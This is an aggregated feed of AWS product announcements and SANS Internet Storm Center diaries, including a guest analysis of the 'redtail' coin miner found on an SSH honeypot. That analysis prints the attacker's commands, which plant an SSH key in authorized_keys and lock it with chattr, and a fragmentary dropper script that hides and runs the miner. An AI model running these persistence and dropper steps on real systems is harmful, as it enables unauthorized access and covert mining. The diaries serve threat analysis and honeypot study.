Simplify custom contact center insights with Amazon Connect analytics data lake

This post was originally published on this site

Analytics are vital to the success of a contact center. Having insights into each touchpoint of the customer experience allows you to accurately measure performance and adapt to shifting business demands. While you can find common metrics in the Amazon Connect console, sometimes you need to have more details and custom requirements for reporting based on the unique needs of your business. 

Starting today, the Amazon Connect analytics data lake is generally available. As announced last year as preview, this new capability helps you to eliminate the need to build and maintain complex data pipelines. Amazon Connect data lake is zero-ETL capable, so no extract, transform, or load (ETL) is needed.

Here’s a quick look at the Amazon Connect analytics data lake:

Improving your customer experience with Amazon Connect
Amazon Connect analytics data lake helps you to unify disparate data sources, including customer contact records and agent activity, into a single location. By having your data in a centralized location, you now have access to analyze contact center performance and gain insights while reducing the costs associated with implementing complex data pipelines.

With Amazon Connect analytics data lake, you can access and analyze contact center data, such as contact trace records and Amazon Connect Contact Lens data. This provides you the flexibility to prepare and analyze data with Amazon Athena and use the business intelligence (BI) tools of your choice, such as, Amazon QuickSight and Tableau

Get started with the Amazon Connect analytics data lake
To get started with the Amazon Connect analytics data lake, you’ll first need to have an Amazon Connect instance setup. You can follow the steps in the Create an Amazon Connect instance page to create a new Amazon Connect instance. Because I’ve already created my Amazon Connect instance, I will go straight to showing you how you can get started with Amazon Connect analytics data lake.

First, I navigate to the Amazon Connect console and select my instance.

Then, on the next page, I can set up my analytics data lake by navigating to Analytics tools and selecting Add data share.

This brings up a pop-up dialog, and I first need to define the target AWS account ID. With this option, I can set up a centralized account to receive all data from Amazon Connect instances running in multiple accounts. Then, under Data types, I can select the types I need to share with the target AWS account. To learn more about the data types that you can share in the Amazon Connect analytics data lake, please visit Associate tables for Analytics data lake.

Once it’s done, I can see the list of all the target AWS account IDs with which I have shared all the data types.

Besides using the AWS Management Console, I can also use the AWS Command Line Interface (AWS CLI) to associate my tables with the analytics data lake. The following is a sample command:

$> aws connect batch-associate-analytics-data-set --cli-input-json file:///input_batch_association.json

Where input_batch_association.json is a JSON file that contains association details. Here’s a sample:

	"InstanceId": YOUR_INSTANCE_ID,
	"DataSetIds": [
	"TargetAccountId": YOUR_ACCOUNT_ID

Next, I need to approve (or reject) the request in the AWS Resource Access Manager (RAM) console in the target account. RAM is a service to help you securely share resources across AWS accounts. I navigate to AWS RAM and select Resource shares in the Shared with me section.

Then, I select the resource and select Accept resource share

At this stage, I can access shared resources from Amazon Connect. Now, I can start creating linked tables from shared tables in AWS Lake Formation. In the Lake Formation console, I navigate to the Tables page and select Create table.

I need to create a Resource link to a shared table. Then, I fill in the details and select the available Database and the Shared table’s region.

Then, when I select Shared table, it will list all the available shared tables that I can access.

Once I select the shared table, it will automatically populate Shared table’s database and Shared table’s owner ID. Once I’m happy with the configuration, I select Create.

To run some queries for the data, I go to the Amazon Athena console.The following is an example of a query that I ran:

With this configuration, I have access to certain Amazon Connect data types. I can even visualize the data by integrating with Amazon QuickSight. The following screenshot show some visuals in the Amazon QuickSight dashboard with data from Amazon Connect.

Customer voice
During the preview period, we heard lots of feedback from our customers about Amazon Connect analytics data lake. Here’s what our customer say:

Joulica is an analytics platform supporting insights for software like Amazon Connect and Salesforce. Tony McCormack, founder and CEO of Joulica, said, “Our core business is providing real-time and historical contact center analytics to Amazon Connect customers of all sizes. In the past, we frequently had to set up complex data pipelines, and so we are excited about using Amazon Connect analytics data lake to simplify the process of delivering actionable intelligence to our shared customers.”

Things you need to know

  • Pricing — Amazon Connect analytics data lake is available for you to use up to 2 years of data without any additional charges in Amazon Connect. You only need to pay for any services you use to interact with the data.
  • Availability — Amazon Connect analytics data lake is generally available in the following AWS Regions: US East (N. Virginia), US West (Oregon), Africa (Cape Town), Asia Pacific (Mumbai, Seoul, Singapore, Sydney, Tokyo), Canada (Central), and Europe (Frankfurt, London)
  • Learn more — For more information, please visit Analytics data lake documentation page.

Happy building,

"K1w1" InfoStealer Uses for Exfiltration, (Fri, May 31st)

This post was originally published on this site

Python remains a nice language for attackers and I keep finding interesting scripts that are usually not very well detected by antivirus solutions. The one I found has a VT score of 7/65! (SHA256:a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c[1]). I decided to call it "k1w1" infostealer because this string is referenced in many variable and function names. The script has classic infostealer capabilities to find interesting pieces of data on the victim's computer but has some interesting techniques. 

Feeding MISP with OSSEC, (Thu, May 30th)

This post was originally published on this site

I'm a big fan of OSSEC[1] for years. OSSEC ("Open Source Security Event Correlator") is a comprehensive, open-source host-based intrusion detection system (HIDS). It is designed to monitor and analyze system logs, detect suspicious activities, and provide real-time alerts for security incidents. OSSEC can perform log analysis, file integrity monitoring, rootkit detection, and active response to mitigate threats. It supports various platforms including Linux, Windows, and macOS, and can be integrated with various security tools and SIEM solutions. I already wrote some diaries about it in the past[2]. I'm running my instance on all my servers, I made some contributions to the project. 

Is that It&#x3f; Finding the Unknown: Correlations Between Honeypot Logs & PCAPs [Guest Diary], (Tue, May 28th)

This post was originally published on this site

[This is a Guest Diary by Joshua Jobe, an ISC intern as part of the BACS program]


Upon starting the Internship in January 2024, I wondered how I was going to tackle analyzing all the logs, how to parse and understand JSON files, and make sense of the plethora of details to even try to make an attack observation.  Where do the files go, how do we correlate the filenames with the hashes, what’s the deal with webhoneypot logs?  During the Introductory Call, Mentor Handler, Guy Bruneau, mentioned the DShield SIEM [1] he has been working on for everyone to use to enhance the internship experience.  I felt this was the perfect opportunity to build something that will assist with correlating the ‘attacks’ on the sensors by ingesting the logs into a SIEM.  This is especially useful for those that want to see the details in a way that is more organized and easier to extrapolate data.  However, simply reviewing activity in the SIEM may not always be enough to build a complete picture for an attack observation.  Likewise, simply parsing through the logs may not always give you a complete picture either.

This blog post will walk through the steps I have taken to build a bigger picture to make an attack observation, briefly going over various attacks such as malicious files, HTTP requests, Cowrie/Webhoneypot JSON logs and PCAPs.

Where to Start

After initially setting up the DShield Honeypot (sensor), it will inevitably take 2-3 weeks or more to begin seeing attacks, especially any that may involve uploading/downloading files.  Be patient.  Interesting IP addresses, files, URLs, TTY logs, etc. will show up.  It is imperative that you follow the instructions to properly expose your sensor or sensors to the internet.
For example, I am running two sensors behind an Asus RT-AC86U router, since this router doesn’t natively allow the same port entries when Port Forwarding two internal IP addresses, I opted to setup one sensor with only TCP ports 8000, 2222, 2223, 8443 open with the second sensor open to the entire port range: TCP/UDP 1:65535.  Utilizing the demilitarized zone (DMZ) is not currently an option due to how my network is setup.  The sensor with the entire port range open tends to see more traffic. 

Once you have your sensors up and running, I highly recommend setting up the DShield SIEM previously mentioned.  Here are some recommendations to consider for the SIEM:

  1. Physical system or VM – it is best to install this on a system you can leave running 24/7 and not use your primary laptop or PC. Using a dedicated system allows the SIEM to constantly ingest the files from the sensors with minimal delays in populating the details in Kibana.  Occasional restarts and updates are expected, but they will be less frequent than if you use your primary system.  I repurposed an old HP laptop with 8 GB of RAM specifically for this task and placed it next to the sensors.
  2. Hard Drive Space – Consider 300-500GB at minimum.  This is critical to hash out ahead of time.  The minimum recommended space for the Docker partition is 300GB, however, the more features you integrate (Arkime, Zeek, PCAP captures, etc), the quicker it will fill up.  I started with 100GB thinking it would be plenty.  I was wrong and within about a month and a half the SIEM wasn’t operating correctly due to not having enough space.  Deleting non-critical data worked for about a week.  I ended up adding a spare 1 TB external HDD, then expanded the volume group and logical volume to use the entire drive.

Now that the sensors are collecting data and the SIEM is ingesting the logs, you need to focus on what your first attack observation will be on.

SIEM Review and Correlation of File Uploads

After about 3 weeks, you should begin seeing quite a bit of interesting activity on the SIEM.  Here are a few examples of what you may see:

You have multiple options to focus your attention on.  If you narrow your results by IP, you may see the associated Username & Passwords, any commands that were attempted, or perhaps filenames.  If you filter by filename, you get the associated IP address or addresses along with all other data associated with just the filename.  When filtering by any filter other than IP to find associated IP addresses, I recommend choosing an IP or multiple IP addresses to populate additional data specific to that IP.  For example, if you want to find associated IP addresses for filename ‘sshd’, hover the cursor over the ‘Filename’ and select the + to add it as a filter near the top:

This filter results in the following IP addresses, Session Codes, and the associated SHA256 file hashes, among other information:

As you can see, filtering by ‘sshd’ identifies 4 IP addresses, associated sessions, and 2 different SHA256 hashes for the same filename.  This also narrows down only the logs related to this filter:







You can further narrow down the results by either IP address or focus on a single hash.  Let’s focus on a single IP address. Following the same example for filtering by filename, chose an IP address to filter on:

 This approach will narrow down the details specific to this IP address.  Select the X to remove the ‘sshd’ filter.  I recommend this  approach to see if this IP address is associated with other activities, such as web requests.

Filtering only a single IP, now reveals other Session details that you can further use to begin building an understanding of this threat actor. 

Using the single IP search also reveals related activity where 46 logs were recorded by the attempts of this threat actor: 




There are additional fields for this section of the SIEM, however, it is cut off for brevity.  Additional fields include destination port, source user command, username and password fields, along with HTTP request body for any web requests.





If you want to find the related details for all the associated IP addresses for the ‘sshd’ file, use the search field to create the expanded filter:

Other than what we’ve already covered, filtering using this search criteria will reveal all associated sessions and other interactions applicable to just those IP addresses.  In this example, there are 148 entries related to these IP addresses:

For the most part, observations that relate to files uploaded to a honeypot, the SIEM is about all I need.  Reviewing the cowrie JSON logs pulls everything with all relevant details for each IP address into a format I feel is a bit easier to follow.  Some data may not always populate on the SIEM, so it isn’t a bad idea to review the logs from the honeypot to confirm.

For Attack Observations related to malicious files, use VirusTotal to check the file hash and decide if it’s worth investigating further using other sandboxes such as Cuckoo Sandbox [2] or Joe Sandbox Cloud [3], among others.  Alternatively, using a virtual machine (VM) to perform various types of malware analysis may reveal details not reported on using automatic malware analysis.

HTTP Requests

One of the great things about using the SIEM is that you get a quick, upfront view of all the interactions happening on your sensor or sensors.  You could also parse through the logs manually to get similar data.  However, one thing that I just couldn’t wrap my head around is what is so special about these web requests?  Sure, we can Google the URLs, perhaps find CVEs or other sources related to a URL.  You might even be able to find vulnerable systems open on the internet.  For me, reviewing these requests on the SIEM or parsing through the logs still didn’t answer why.  Here is an example of web requests and user agents you might see on the SIEM to decide what you want to focus on:

Just like narrowing down results from potentially malicious files, we can do the same with the requests on the web interface of the SIEM to find the related IPs and other details.  Something I didn’t point out before is that the SIEM includes features to facilitate gathering information on a threat actor from CyberGordon, Censys, Shodan, or internally using Cont3xt: 


By narrowing down interesting files or web requests, you can use this section to visit the applicable websites for more information.  It is just an easier way of clicking and viewing details about that IP address.




Since the SIEM wasn’t cutting it for me with web requests, I turned to the logs from the sensors to manually parse.  However, as I will expand on in the last section, neither was really answering my question of what is making these requests so special.  But first, let’s turn to the logs.

Log Reviews from the DShield Sensor

Parsing the logs reveals a lot of details about an IP address or even web requests.  When I first started learning how to parse the JSON logs, I used both ChatGPT and an article from DigitalOcean called “How To Transform JSON Data with jq” [4].  Once you understand the structure of the JSON files, it is simple to parse the logs based on just about any search criteria.  To parse Telnet/SSH logs based on an IP address, you can use these commands:

There are a lot more details that can be pulled out, but you also must know what that log contains to know what the structure is.  Use the following command to parse the first object containing all the associated key-value pairs:

As an alternative to running the above commands, I decided to create a Python script to automate this approach to extract details I felt at the time to contain the details I wanted to focus on. [5]

I maintain two sensors, which automatically transfer copies of logged data to separate folders, daily. The script is in its own directory, so the file paths are relative to the script's location. Additionally, users have the flexibility to filter data either by IP address or Session ID. This is where the DShield SIEM proves invaluable. Users can first identify interesting data points, then further refine their search based on either IP address or Session ID:

For the sake of space, I only copied a portion of the results.  The output above also has data for all related sessions associated with that IP address.

When it comes to the webhoneypot logs, the process is similar, but the details will be different as the object and key-value pairs will be different.  Here is an example output of the webhoneypot logs:

The webhoneypot logs contain a lot of data.  Most, in my opinion, aren’t applicable to the details I would like to see.  Aside from manually parsing the files like the TELNET/SSH logs, I created a script specific to the format for these logs [5].  This gives a bit of flexibility for what you want to search for and whether you want to include any URLs that only begin with a forward slash “/”.  Depending on what you are searching for, the search could return hundreds of resulting logs.  For this reason, the script saves the results to a file, which also allows it to run faster.  Here is an example of running the script, then a partial output of the file:

The partial URL search is useful if you notice multiple URLs that contain a subdirectory in the path such as /jenkins/script and /jenkins/login.

While the web logs provide a lot of details, this goes back to what I mentioned earlier about something still seemed to be missing and answering the question of why these are being accessed.  This is where the PCAPs in the next section come into play.

Why You Should Use PCAPs

Having a honeypot running provides only so much insight into what a threat actor is doing just by reviewing the logs.  However, it wasn’t until I decided to focus an attack observation based upon the web requests that I realized something is missing.  If you haven’t decided to collect PCAPs up to this point, I highly recommend evaluating options to automatically collect them daily.  One option is using Daemonlogger by following the instructions provided by Mr. Bruneau’s DShield SIEM setup on Github [1] or finding a solution that works best for you.  

What you don’t get with the web logs from the honeypot is any inclination of what the threat actor may be doing – at least not from what I was able to observe.  For example, a path stood out to me that had over 500 requests to /cgi-bin/nas_sharing.cgi.  If you aren’t familiar with cgi-bin, it is often found on routers and other network devices such as NAS (network attached storage) devices from manufacturers such as Linksys, D-Link, Netgear, QNAP, Synology, etc.  A vulnerability in a path such as this is enticing to the actor as you will see in a moment.

After you have narrowed down an attack observation, found a URL path, and further reviewed the logs, you also narrowed down the dates to focus on.  Going back to how Daemonlogger is setup, it logs one PCAP file to a daily folder.  This makes it easy to go directly to the PCAP that will have the traffic of the URL to investigate further.  Taking the example of the /cgi-bin/nas_sharing.cgi, I reviewed PCAPs between 15-24 Apr 2024.  This is what I discovered that made these web requests even more interesting:

Remote Code Execution (RCE):

Parsing through the honeypot logs, I couldn’t find any correlation of that command.  The threat actor is using obfuscation to attempt to hide what they are doing by encoding the command into Base64.  Decoding the encoded string reveals the following:

With this information, you can build a rather thorough attack observation, having more data than simply a web request and researching the vulnerabilities associated with those file paths.
Here is one more HTTP request to highlight why you should capture network traffic on the sensor:

Without it, all you would find in the logs is that the HTTP request method is POST and URL is /device.rsp along with other associated data.

Final Thoughts

If you didn’t catch the details regarding data retention on the sensor at the start of the internship, the logs are deleted at certain intervals.  If you want to retain logs, set up an automatic way to transfer the logs to a separate system or a separate folder on the sensor.  My first or second attack observation included some logs that just so happen to be at the tail end of when they are deleted.  Fortunately, I had copies of the data, but I was relying on the details within the sensor.  When I went to parse the data again the next day, it was gone.  So, if you want long-term data retention for any of the logs, transfer the logs to another folder or system.  

I can’t reiterate it enough about the importance of capturing network traffic on the sensor.  The first month or so I hadn’t considered it.  After I started capturing the traffic, I rarely reviewed the PCAPs as most of the data I was looking at was encrypted traffic from the file uploads.  However, when it came to the web requests, this proved to be invaluable information.  

From observing the DShield SIEM to manually parsing the logs, find what works best for you and take time to review the data, extract interesting information, and develop the attack observation report over a few days.  


A few portions of this post were aided with the assistance of ChatGPT, most content is original – 

Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Amazon EC2 high memory U7i Instances for large in-memory databases

This post was originally published on this site

Announced in preview form at re:Invent 2023, Amazon Elastic Compute Cloud (Amazon EC2) U7i instances with up to 32 TiB of DDR5 memory and 896 vCPUs are now available. Powered by custom fourth generation Intel Xeon Scalable Processors (Sapphire Rapids), these high memory instances are designed to support large, in-memory databases including SAP HANA, Oracle, and SQL Server. Here are the specs:

Instance Name vCPUs
Memory (DDR5)
EBS Bandwidth
Network Bandwidth
u7i-12tb.224xlarge 896 12,288 GiB 60 Gbps 100 Gbps
u7in-16tb.224xlarge 896 16,384 GiB 100 Gbps 200 Gbps
u7in-24tb.224xlarge 896 24,576 GiB 100 Gbps 200 Gbps
u7in-32tb.224xlarge 896 32,768 GiB 100 Gbps 200 Gbps

The new instances deliver the best compute price performance for large in-memory workloads, and offer the highest memory and compute power of any SAP-certified virtual instance from a leading cloud provider.

Thanks to AWS Nitro System, all of the memory on the instance is available for use. For example, here’s the 32 TiB instance:

In comparison to the previous generation of EC2 High Memory instances, the U7i instances offer more than 135% of the compute performance, up to 115% more memory performance, and 2.5x the EBS bandwidth. This increased bandwidth allows you to transfer 30 TiB of data from EBS into memory in an hour or less, making data loads and cache refreshes faster than ever before. The instances also support ENA Express with 25 Gbps of bandwidth per flow, and provide an 85% improvement in P99.9 latency between instances.

Each U7i instance supports attachment of up to 128 General Purpose (gp2 and gp3) or Provisioned IOPS (io1 and io2 Block Express) EBS volumes. Each io2 Block Express volume can be as big as 64 TiB and can deliver up to 256K IOPS at up to 32 Gbps, making them a great match for U7i instances.

The instances are SAP certified to run Business Suite on HANA, Business Suite S/4HANA, Business Warehouse on HANA (BW), and SAP BW/4HANA in production environments. To learn more, consult the Certified and Supported SAP HANA Hardware and the SAP HANA to AWS Migration Guide. Also, be sure to take a look at the AWS Launch Wizard for SAP.

Things to Know
Here are a couple of things that you should know about these new instances:

Regions – U7i instances are available in the US East (N. Virginia), US West (Oregon), and Asia Pacific (Seoul, Sydney) AWS Regions.

Operating Systems – Supported operating systems include Amazon Linux, Red Hat Enterprise Linux, SUSE Linux Enterprise Server, Ubuntu, and Windows Server.

Larger Instances – We are also working on offering even larger instance later this year with increased compute to meet our customer needs.


AWS Weekly Roundup – LlamaIndex support for Amazon Neptune, force AWS CloudFormation stack deletion, and more (May 27, 2024)

This post was originally published on this site

Last week, Dr. Matt Wood, VP for AI Products at Amazon Web Services (AWS), delivered the keynote at the AWS Summit Los Angeles. Matt and guest speakers shared the latest advancements in generative artificial intelligence (generative AI), developer tooling, and foundational infrastructure, showcasing how they come together to change what’s possible for builders. You can watch the full keynote on YouTube.

AWS Summit LA 2024 keynote

Announcements during the LA Summit included two new Amazon Q courses as part of Amazon’s AI Ready initiative to provide free AI skills training to 2 million people globally by 2025. The courses are part of the Amazon Q learning plan. But that’s not all that happened last week.

Last week’s launches
Here are some launches that got my attention:

LlamaIndex support for Amazon Neptune — You can now build Graph Retrieval Augmented Generation (GraphRAG) applications by combining knowledge graphs stored in Amazon Neptune and LlamaIndex, a popular open source framework for building applications with large language models (LLMs) such as those available in Amazon Bedrock. To learn more, check the LlamaIndex documentation for Amazon Neptune Graph Store.

AWS CloudFormation launches a new parameter called DeletionMode for the DeleteStack API — You can use the AWS CloudFormation DeleteStack API to delete your stacks and stack resources. However, certain stack resources can prevent the DeleteStack API from successfully completing, for example, when you attempt to delete non-empty Amazon Simple Storage Service (Amazon S3) buckets. The DeleteStack API can enter into the DELETE_FAILED state in such scenarios. With this launch, you can now pass FORCE_DELETE_STACK value to the new DeletionMode parameter and delete such stacks. To learn more, check the DeleteStack API documentation.

Mistral Small now available in Amazon Bedrock — The Mistral Small foundation model (FM) from Mistral AI is now generally available in Amazon Bedrock. This a fast-follow to our recent announcements of Mistral 7B and Mixtral 8x7B in March, and Mistral Large in April. Mistral Small, developed by Mistral AI, is a highly efficient large language model (LLM) optimized for high-volume, low-latency language-based tasks. To learn more, check Esra’s post.

New Amazon CloudFront edge location in Cairo, Egypt — The new AWS edge location brings the full suite of benefits provided by Amazon CloudFront, a secure, highly distributed, and scalable content delivery network (CDN) that delivers static and dynamic content, APIs, and live and on-demand video with low latency and high performance. Customers in Egypt can expect up to 30 percent improvement in latency, on average, for data delivered through the new edge location. To learn more about AWS edge locations, visit CloudFront edge locations.

Amazon OpenSearch Service zero-ETL integration with Amazon S3 — This Amazon OpenSearch Service integration offers a new efficient way to query operational logs in Amazon S3 data lakes, eliminating the need to switch between tools to analyze data. You can get started by installing out-of-the-box dashboards for AWS log types such as Amazon VPC Flow Logs, AWS WAF Logs, and Elastic Load Balancing (ELB). To learn more, check out the Amazon OpenSearch Service Integrations page and the Amazon OpenSearch Service Developer Guide.

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS news
Here are some additional news items and a Twitch show that you might find interesting:

AWS Build On Generative AIBuild On Generative AI — Now streaming every Thursday, 2:00 PM US PT on, my colleagues Tiffany and Mike discuss different aspects of generative AI and invite guest speakers to demo their work. Check out show notes and the full list of episodes on

Amazon Bedrock Studio bootstrapper script — We’ve heard your feedback! To everyone who struggled setting up the required AWS Identity and Access Management (IAM) roles and permissions to get started with Amazon Bedrock Studio: You can now use the Bedrock Studio bootstrapper script to automate the creation of the permissions boundary, service role, and provisioning role.

Upcoming AWS events
Check your calendars and sign up for these AWS events:

AWS SummitsAWS Summits — It’s AWS Summit season! Join free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Register in your nearest city: Dubai (May 29), Bangkok (May 30), Stockholm (June 4), Madrid (June 5), and Washington, DC (June 26–27).

AWS re:InforceAWS re:Inforce — Join us for AWS re:Inforce (June 10–12) in Philadelphia, PA. AWS re:Inforce is a learning conference focused on AWS security solutions, cloud security, compliance, and identity. Connect with the AWS teams that build the security tools and meet AWS customers to learn about their security journeys.

AWS Community DaysAWS Community Days — Join community-led conferences that feature technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from around the world: Midwest | Columbus (June 13), Sri Lanka (June 27), Cameroon (July 13), New Zealand (August 15), Nigeria (August 24), and New York (August 28).

You can browse all upcoming in-person and virtual events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

— Antje

This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS!

Files with TXZ extension used as malspam attachments, (Mon, May 27th)

This post was originally published on this site

Malicious e-mail attachments come in all shapes and sizes. In general, however, threat actors usually either send out files, which themselves carry a malicious payload – such as different scripts, Office documents or PDFs – or they send out “containers”, which include such files – e.g., image files or archives. These container files, especially, can sometimes be quite unusual… Which is where today’s diary comes in.

YARA 4.5.1 Release, (Sun, May 26th)

This post was originally published on this site

YARA 4.5.0 was released with a small change to the regex syntax (allowing more whitespace) and many bugfixes.

Victor considers that although YARA-X (the rewrite of YARA in Rust) is still in beta, you can start to use it now.

From his blog post "YARA is dead, long live YARA-X":

YARA-X is still in beta, but is mature and stable enough for use, specially from the command-line interface or one-shot Python scripts. While the APIs may still undergo minor changes, the foundational aspects are already established.


Didier Stevens
Senior handler

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

csvkit, (Sat, May 25th)

This post was originally published on this site

After reading my diary entry "Checking CSV Files", a reader informed me that CSV toolkit csvkit also contains a command to check CSV files:

Here is this tool running on the same CSV file I used in my diary entry:

csvkit has a lot of dependencies, it took my quite some effort to install it on a machine without Internet connection. I had to download, transfer and install 50+ packages.


Didier Stevens
Senior handler

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Analysis of ?redtail? File Uploads to ICS Honeypot, a Multi-Architecture Coin Miner [Guest Diary], (Wed, May 22nd)

This post was originally published on this site

[This is a Guest Diary by Robert Riley, an ISC intern as part of the BACS program]


Honeypot file uploads can be like opening pandoras box, never knowing what may get uploaded. Malware comes in all sorts of varieties and flavors, many suited for specific purposes and some for multiple. Today, we'll look at a malware named “redtail” and its purpose falls under the category, "Coin miners", software illegally uploaded to hosts for the purpose of covertly mining cryptocurrency for a remote actor by hijacking a host’s resources. The question we’d like answered is what capabilities do modern coin miners possess, and how can they be identified? Using this information from modern threat feeds could both give further insight into the threat actors perpetuating this attack, while also giving a glimpse into the current capabilities of coin miner malware actively being used in today’s threat landscape.

Description of the Subject

The “redtail” samples being evaluated are a look into a modern variant of coin miner malware being used in the wild today. The samples are interesting in that they have the capability to run on 4 different CPU architectures, showing just how much this malware could potentially infect a vast number of devices/hosts. We’ll be looking into the process of how the threat actor gained initial access, who are the threat actors, the different samples uploaded, and how these samples were identified as a coin miner.

Initial Analysis of the Attack

The analysis began in the form of an earlier attack observation [8]. I started by evaluating the IP, who was seen initially connected to the honeypot over SSH port 2222 on Feb 23rd 12:23:25 2024, shown as rapid logins happening back-to-back in increments of 23 (sign of bot behavior). After failing to login using the [root/lenovo] credentials, the actor successfully logs in using the [root/Passw0rd123] credentials. After authentication, the actor uploads a total of 5 files to the honeypot (redtail.arm7, redtail.arm8, redtail.i686, redtail.x86_64, 

The actor then runs commands that make the file executable, then adds a custom public key to the ~/.ssh/authorized_keys file before making said file unmodifiable using the command The full commands used are pated below:

chmod +x; sh;
rm -rf;
mkdir -p ~/.ssh;
chattr -ia ~/.ssh/authorized_keys;
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys;
chattr +ai ~/.ssh/authorized_keys;
uname -a

Taking a closer look at the code for shows us even more about the intentions of the remote IP. Namely, the shell script attempts to determine the host architecture based on the output of the command chattr +ai. Using this, the script copies the contents of the relevant redtail executable to the “.redtail” file on the host, and executes this new file, after which the original uploaded & unhidden redtail files are then deleted. If the architecture cannot be determined, then all the “redtail” file contents are copied to the “.redtail” file for good measure. The code is pasted below for more details:



if [ -f "/bin/uname" ] && [ -f "/bin/grep" ]; then
        ARCH=$(uname -mp);
        if echo "$ARCH" | grep -q "x86_64" ; then
        elif echo "$ARCH" | grep -q "i686"; then
        elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
        elif echo "$ARCH" | grep -q "armv7"; then

#sysctl -w vm.nr_hugepages=$(nproc)

#for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d);
#    echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages";

FOLDER=$(find / -writable -executable -readable -not -path "/proc/*" | head -n 1 || echo /tmp);

if [ "$CURR" != "$FOLDER" ]; then
        mv redtail.* $FOLDER
        cd $FOLDER

if [ "$NOARCH" = true ]; then
        cat redtail.x86_64 > .redtail; chmod +x .redtail; ./.redtail;
        cat redtail.i686 > .redtail; chmod +x .redtail; ./.redtail;
        cat redtail.arm8 > .redtail; chmod +x .redtail; ./.redtail;
        cat redtail.arm7 > .redtail; chmod +x .redtail; ./.redtail;
        cat "redtail.$ARCH" > .redtail; chmod +x .redtail; ./.redtail;

rm -rf redtail.*

Just doing a hash lookup on any of the redtail files, it can quickly be determined that its goal is that of a coin miner, as looking up the hash of each of the files in Virus Total tags these files with such labels. This sample showed behaviors such as executing crontab, modifying iptables rules, and shows UPX packing common in other coin miners, and listens on a newly created socket. 

Digging Deeper

The 1st IP, x.x.x.163, is located either in the Netherlands or France, and comes from the ISP Constant MOULIN. Doing a quick analysis using a few reputation sites for this IP, we see that this attack is one of the 1st recorded instances of its malicious behavior [2], a VT score of 23/90 [1], and a 100% confidence of abuse [4]. This IP still has reports still being generated today by both on my honeypot and in the wild. Regarding “redtail” file uploads, there are a recorded 5 separate times where this IP successful uploads “redtail” & “” files to the honeypot. In each case before uploading, they successfully authenticate as the “root” user before. The most recent activity from this IP on the honeypot is as recent as 5/2, trying to guess SSH usernames & passwords. Below is the complete activity of this IP, with the 5 “redtail” submissions marked.

It gets more interesting when looking at all the IP's who tried to submit these "redtail" and "" files, as there are only two IP's engaging in this activity: &, the secondary IP being one we haven’t evaluated yet. This 2nd IP, x.x.x.236, located in the Netherlands, is from the Alsycon Media B.V. ISP. Doing a similar reputation analysis on this IP shows malicious activity as far back as 10/7/2024 [5], a VT score of 17/91 [4], and once again a 100% confidence of abuse [6]. For the honeypot, this IP was first seen on 1/28/2024, making it the 1st IP seen on the honeypot engaging in this activity. The IP tried to login via SSH using brute force, although curiously upon successfully logging disconnects shortly after. It isn’t until about 2 weeks later, on 2/11, that we see a successful “redtail” & “” file uploads after authenticating using the [root/lenovo] username/password combo. The last time this IP is seen is on 3/20/2024, trying to login via SSH w/ the [root/a] username/password combo.

This is the only recorded instance of file uploads from this IP, as the address engages in a variety of behaviors against this endpoint compared to the primary IP, x.x.x.163. This includes connecting to various SSH ports, many different username/password submissions, and even URL requests at one point (w/ interesting user agents). It’s interesting to note that the primary IP, x.x.x.163, may also be geographically located in the Netherlands like the secondary IP, but can’t confirm for certain due to the ISP being spread across countries. The implication here is that if both IPs are from the NL, one could point to both these IP’s being from the same threat actor, but that is speculative. For the most part, however, most of the activity comes from the primary IP, x.x.x.163

Looking closer at the “redtail” and “” files themselves by hash reveals interesting info on the IP’s who upload them to the honeypot. Out of the 28 unique hashes ever submitted, every single one of these file submissions had a Virus Total score of at least 19, another piece of evidence proving maliciousness [7]. Between the “redtail” files, each had unique hashes that were only used in the respective batch submission. This means that the 4/5 files submitted during the initial analysis of the primary IP submission on 2/23, that those files were never once used again by either IP. This applies to every one of the 6 batch submission of “redtail” files between both IP’s. The exception to this rule was regarding the “” file, which had 2 hashes that were submitted twice on different dates. 


This analysis stuck out for a few reasons. One was the sheer number of file submissions, totaling over 400+ separate submissions over the course of about 4 months. Another was how all these submissions came from only 2 IP’s in roughly the same geographic area. These combine to show insight into more modern variants of coin miner malware, and the threat actors spreading this malware.

[1] (23/90 VT score)
[2] (5/10 risk score)
[3] (100% confidence of abuse)
[4] (17/91 VT score)
[5] (0/10 risk score)
[6] (100% confidence of abuse)
[7] “Hash Info.csv” – Sheet of all file submissions w/ info (attached)
[8] “Attack Observation #5.pdf” – AO where initial analysis of primary IP was done (attached)
[9] (provided visualizations)

Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.